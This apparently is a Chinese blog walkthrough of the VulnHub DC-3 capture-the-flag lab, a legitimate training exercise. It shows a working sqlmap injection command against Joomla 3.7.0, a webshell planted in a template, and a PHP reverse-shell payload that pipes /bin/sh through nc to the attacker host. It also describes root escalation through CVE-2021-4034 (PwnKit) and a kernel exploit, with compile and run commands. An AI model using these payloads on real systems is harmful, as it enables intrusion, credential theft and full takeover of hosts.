写在前面
靶场链接:
https://www.vulnhub.com/entry/dc-32,312/
有些知识点在DC:1中提到,可以翻阅
DC:1
注意该靶场仅需获取唯一FLAG。(需提权至root)
开启时,有一个连接设备的报错(VMware),像如下修改即可,修改DC_3.vmx
信息搜集
扫描c段,这里115是攻击机,159是靶机,141为物理机,61为网关
端口扫描,查到80端口
进入,看到网页
指纹识别出是joomla CMS
MSF
使用msf搜索是否有现成的,这里搜查到不少检测模块和入侵模块
继续信息收集,确定poc范围,查找scanner有好几个,这里我都试了试
这里暴力枚举登录,但是并未成功
gallerywd扫描没出东西
page枚举,也仅仅发现很少的网页
插件扫描,可以看到有一些sql注入的点
版本扫描,查到版本为3.7.0
有了上述的信息,我们可以更进一步,更加具体的打poc,3.7有大量SQL注入
第二个版本号吻合,查看该poc,调sqlmap
使用该命令,查到mysql版本,数据库
指定 joomladb 数据库,查表
显然有一个 #__users 表,大概率有敏感信息,指定该表,查到列
显然,这里有敏感列名,使用以下payload dump出数据
sqlmap -u "http://192.168.201.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb -T \#__users -C "username,password" --dump
得到密码hash值
使用john爆破,注意这里首先将密文存储为文件,爆破出密码为snoopy
使用用户密码登录,注意是登录后台 /administrator
在模板文件中注入木马
蚁剑连接
Pkexec 提权
连接进来,首先查看suid文件,准备suid提权。这里其实并没有太大的发现,suid文件比较常规。但是由于不久前出的pwnkit巨大漏洞,几乎对以前版本的pkexec是通杀,首先可以测一下pkexec漏洞
poc地址
https://github.com/berdav/CVE-2021-4034
CVE-2021-4034 在这里不做讲解,仅作利用,使用这个漏洞可以直接获得root权限
通过蚁剑上传文件,非常方便
编译并执行poc
探测出易受该漏洞攻击,准备使用这个提权。由于蚁剑的虚拟终端并不是持久性的,它是通过命令执行模拟的,(提权后需要持续性交互)所以这里先反弹一个shell出来。
借鉴的其他同学的payload,适用于php,保存后前往主页即可触发
<?php
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.201.115 2333 >/tmp/f');
?>
攻击机监听后弹回shell
执行漏洞poc,直接获取root权限
得到flag
ubuntu 16.04提权
较老的方法,也是本题的大多数解法,这里,首先信息收集内核,版本等等信息,是ubuntu 16.04
在expdb中查找是否含有该版本的poc,发现是有的,那个centos 7 非常符合
打开poc,找到exp下载地址
下载地址如下
https://bugs.chromium.org/p/project-zero/issues/detail?id=808
下载完毕后上传该poc至被害主机中
解压
编译后运行
./compile.sh
./doubleput
提权成功,找到flag文件
1368
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
